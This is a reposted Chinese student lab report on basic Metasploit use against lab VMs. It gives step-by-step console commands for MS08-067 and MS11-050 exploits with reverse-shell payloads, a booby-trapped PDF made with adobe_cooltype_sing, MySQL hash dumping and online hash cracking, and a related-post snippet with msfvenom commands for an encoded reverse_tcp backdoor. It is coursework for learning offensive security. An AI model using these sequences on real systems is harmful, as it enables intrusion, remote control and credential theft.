《网络对抗》Exp5 MSF基础应用

最新推荐文章于 2021-05-13 09:51:16 发布
最新推荐文章于 2021-05-13 09:51:16 发布
阅读量140 收藏
点赞数
原文链接:http://www.cnblogs.com/hxl681207/p/8964722.html
版权

20155336《网络对抗》Exp5 MSF基础应用

一、基础知识回答

  • 用自己的话解释什么是exploit,payload,encode
    • exploit:渗透攻击的模块合集,将真正要负责攻击的代码传送到靶机中。
    • payload:攻击载荷,exploit把它传送到靶机中后,它就负责执行相应的攻击代码。
    • encode:编码,实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。

二、实践过程

  • 1.Windows服务渗透攻击——MS08-067安全漏洞
    • ①攻击机:kali ②靶机:windows XP SP3(English)

在kali中输入msfconsole,然后依次输入一下命令:

  • msf > use exploit/windows/smb/ms08_067_netapi
  • msf exploit(ms08_067_netapi) > show payloads
  • msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连
  • msf exploit(ms08_067_netapi) > set LHOST 192.168.199.190//攻击机ip
  • msf exploit(ms08_067_netapi) > set LPORT 5336 //攻击端口
  • msf exploit(ms08_067_netapi) > set RHOST 192.168.192.226//靶机ip,特定漏洞端口已经固定
  • msf exploit(ms08_067_netapi) >set target 0//自动选择目标系统类型,匹配度较高
  • msf exploit(ms08_067_netapi) > exploit //攻击

1071513-20180502145234430-1349647836.png

1071513-20180502145357604-343830738.png

建立会话,攻击成功;

  • 2.浏览器渗透攻击——MS11-050
    • ①攻击机:kali ②靶机:WindowsXP Professional sp2/Windows7专业版 ③IE版本:7.0/8.0
  • 在kali中输入msfconsole进入控制台,依次输入以下指令:
    • msf > use windows/browser/ms11_050_mshtml_cobjectelement
    • msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
    • msf exploit(ms11_050_cobjectelement) > set LHOST 172.30.4.231 //攻击机ip
    • msf exploit(ms11_050_cobjectelement) > set LPORT 5336 //攻击端口固定
    • msf exploit(ms11_050_cobjectelement) > set URIPATH 20155336hgy //统一资源标识符路径设置
    • msf exploit(ms11_050_cobjectelement) > exploit

1071513-20180425212104841-1446315586.png

在浏览器输入http://172.30.4.231:8080/20155336hgy
,IE出现弹窗,警告遇到问题需关闭程序:

1071513-20180425213109671-2071824925.png

攻击机想要建立会话,但是靶机已经禁止了这个网页的访问,失败了。IE的浏览器弹窗阻止了~~但是我已经关掉了防火墙,可还是错误。查看了kali的链接情况,总是没有得到响应

1071513-20180427204513993-165015245.png

总之一输入网址,IE就会直接卡死然后报错。参考了狄维佳同学的补救措施,还是无能为力。。万般无奈之下,只能先告一段落惹~~

  • 3.针对Office软件的渗透攻击——MS10-087 如出一辙的操作!!
    • ①攻击机:kali ②靶机:windowsXP Professional sp2 ③Office版本:2003
    • kali输入msfconsole进入控制台
    • msf > use windows/fileformat/adobe_cooltype_sing
    • msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
    • msf exploit(adobe_cooltype_sing) > set LHOST 172.30.5.99 //攻击机ip
    • msf exploit(adobe_cooltype_sing) > set LPORT 5336 //攻击端口
    • msf exploit(adobe_cooltype_sing) > set FILENAME 20155336.pdf//设置生成pdf文件的名字
    • msf exploit(adobe_cooltype_sing) > exploit //攻击

1071513-20180427210459397-73694633.png

生成的pdf如下图所示:

1071513-20180427210548258-285267461.png

将生成的pdf文件拷贝到靶机上。

在kali上输入back退出当前模块,进入监听模块,输入以下命令:

  • msf > use exploit/multi/handler //进入监听模块
  • msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
  • msf exploit(handler) > set LHOST 192.168.5.99 //攻击机ip
  • msf exploit(handler) > set LPORT 5336
  • exploit

1071513-20180427212013390-78938748.png

在靶机上打开201553336.pdf文件:(有一点点的卡顿~~~)

1071513-20180427211815236-68084068.png

攻击成功:

1071513-20180427212134730-1814872371.png

  • 4.辅助模块的应用:auxiliary/scanner/mysql/mysql_hashdump

  • msf > use auxiliary/scanner/mysql/mysql_hashdump
  • msf auxiliary(mysql_hashdump) > set RHOSTS 192.168.1.106
  • msf auxiliary(mysql_hashdump) > set PASSWORD sa
  • msf auxiliary(mysql_hashdump) > set USERNAME sa
  • msf auxiliary(mysql_hashdump) > set THREADS 100

  • msf auxiliary(mysql_hashdump) > exploit

1071513-20180502142845546-783456135.png

  • 这里,作为攻击者,是随便输入用户名和密码;那,得到这样的hash值密码,该怎么破解呢?嘿嘿,敲黑板,快拿小本本记下来,干货来了~~

http://www.cmd5.com/

1071513-20180502143030533-452157177.png

1071513-20180502143118231-2109722204.png

(不说了...?????)

1071513-20180502143209475-13386358.png

  • bingo!!!(#_#肉疼)

实验体会

本次实验是针对metasploit基础的应用,在各种攻击方法都有所体验。通过这次实验,给我的感受就是对于攻击目标,我们要有一个很明确的想法和思路去实施步骤和计划,做到知己知彼。譬如攻击前的use.......,设置载荷之前的命令set payloads......。而且要很好的去利用show options这个命令去进一步了解需要配置的参数,yes显示必须要设置,no为可选项。对于实验中出现的问题要有耐心,不能简单的只得到一个攻击结果就行了,要仔细的去分析。就像自己在这次实验中出现的问题,攻击Adobe阅读器的时候用自己的kali和windows尝试了很多次,包括修改端口最后的还是无法回连到kali下,后来借用同学的电脑一次就成功了。之后经过修改电脑配置也解决了问题,所以有了问题不能浮躁,不去解决,多想想多百度~~

转载于:https://www.cnblogs.com/hxl681207/p/8964722.html

weixin_30668887
关注
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 384
一、原理与实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
20204323太晓梅 网络对抗exp6 MSF应用基础
m0_57567318的博客
05-04 152
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。
2018-2019 20165237网络对抗 Exp5 MSF基础应用
weixin_30354675的博客
04-21 129
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 一个主动攻击实践,如ms08-067; (1分) ms17_010_psexec(√) 不唯一 一个针对浏览器的攻击,如ms11-050;(1分) ms14_064_ole_lode_execution(√)不...
网络对抗 Exp5 MSF基础应用 20154311 王卓然
weixin_30700977的博客
04-18 154
Exp5 MSF基础应用 1. 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 1.1一个主动攻击实践,如ms08_067; 1.2 一个针对浏览器的攻击,如ms10_018、ms12_004; 1.3 一个针对客户端的攻击,如Adobe、ms10_087; 1.4 成功应用辅助模块(smb版本...
网络对抗技术-Exp3-免杀原理 20181314
weixin_46014245的博客
03-31 707
一、免杀原理及基础问题回答 1.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。 2.基础问题回答 杀软是如何检测出恶意代码的? 基于特征码的检测:简单来说一段特征码就是一段或多段数据,经过对许多恶意代码的分析,我们发现了该类恶意代码经常出
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 953
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
2019-2020-2 20175212童皓桢《网络对抗技术》 Exp4 恶意代码分析
weixin_44826338的博客
04-17 559
2019-2020-2 20175212童皓桢《网络对抗技术》 Exp1 恶意代码分析 目录 1. 实验目标 2. 实验内容 2.1 系统运行监控 2.1.1 Windows计划任务schtasks 2.1.2 sysmon工具 2.2 恶意软件分析 2.2.1 系统运行监控 2.2.1 系统运行监控 3、答老师问 3.1 实验收获与感想 3.2 如果在工作中怀...
KKобтьу╬kkx.net.url
09-14
KKобтьу╬kkx.net.url
『人事流程图新』人力资源培训计划制定工作流程图.xlsx
09-14
『人事流程图新』人力资源培训计划制定工作流程图.xlsx
Delphi XE Web开发使用嵌入版Firebird数据库,演示IntraWeb的使用
09-14
Delphi XE Web开发使用嵌入版Firebird数据库,演示IntraWeb的使用。 开发测试环境: Embarcadero Delphi XE Version 15.0.3890.34076 IntraWeb 14.0.32 Firebird 2.5.9 (Windows Build) 注:本delphi源代码参考官方文档,修改测试而成,都是本人实验成功的。(本人CSDN的ID:i8013)
基于Springboot和Mysql的汽车销售网代码,包括程序,中文注释,配置说明操作步骤
09-14
汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网-汽车销售网 1、资源说明:汽车销售网源码,本资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 2、适用人群:计算机相关专业(如计算计、信息安全、大数据、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工等学习者,作为参考资料,进行参考学习使用。 3、资源用途:本资源具有较高的学习借鉴价值,可以作为“参考资料”,注意不是“定制需求”,代码只能作为学习参考,不能完全复制照搬。需要有一定的基础,能够看懂代码,能够自行调试代码,能够自行添加功能修改代码。 4. 最新计算机软件毕业设计选题大全(文章底部有博主联系方式): https://blog.csdn.net/2301_79206800/article/details/135931154 技术栈、环境、工具、软件: ① 系统环境:Windows ② 开发语言:Java ③ 框架:SpringBoot ④ 架构:B/S、MVC ⑤ 开发环境:IDEA、JDK、Maven、M
MATLAB的图像处理系统GUI设计.zip
09-14
linux常用命令大全
基于Flask的个人博客与小说爬取系统.zip
最新发布
09-14
该项目是一个基于Flask和requests框架的个人博客系统,并集成了小说爬取功能。用户可以在博客上发布文章,管理文章,同时还可以通过系统爬取小说并展示。项目提供了详细的安装教程和环境搭建步骤,以及清晰的用户界面展示。这是一个功能丰富,实用便捷的网站系统。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看READmE.文md件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
基于ssm的体育器材租借管理系统设计与实现.docx
09-14
基于ssm的体育器材租借管理系统设计与实现.docx
基于ResNet+BERT的多种融合方法实现的多模态情感分析源码+数据集+项目说明(人工智能课程实验)
09-14
基于ResNet+BERT的多种融合方法实现的多模态情感分析源码+数据集+项目说明(人工智能课程实验),本项目基于Hugging Face和torchvision实现,共有五种融合方法(2Naive 3Attention),在Models文件夹中查看 Project Structure |-- Multimodal-Sentiment-Analysis |-- Config.py |-- main.py |-- README.md |-- requirements.txt |-- Trainer.py |-- data | |-- .DS_Store | |-- test.json | |-- test_without_label.txt | |-- train.json | |-- train.txt | |-- data |-- Models | |-- CMACModel.py | |-- HSTECModel.py |
『人事流程图新』员工奖惩流程图.xls
09-14
『人事流程图新』员工奖惩流程图.xls
『人事流程图新』培训流程图.docx
09-14
『人事流程图新』培训流程图.docx
java毕业设计,后台式的慈善捐赠,绿色回收系统.zip
09-14
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
『人事流程图新』新员工入职流程简图.doc
09-14
『人事流程图新』新员工入职流程简图.doc
MSF基础与团队模型详解:原则、应用与CMMI比较
在实际课程中,MSF的培训通常会通过案例研究、讨论和实践活动来深入讲解这些概念,并鼓励参与者将理论应用到实际工作中。通过讨论,学员可以理解一个优秀的项目团队应具备的特点,如良好的沟通、明确的目标导向、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值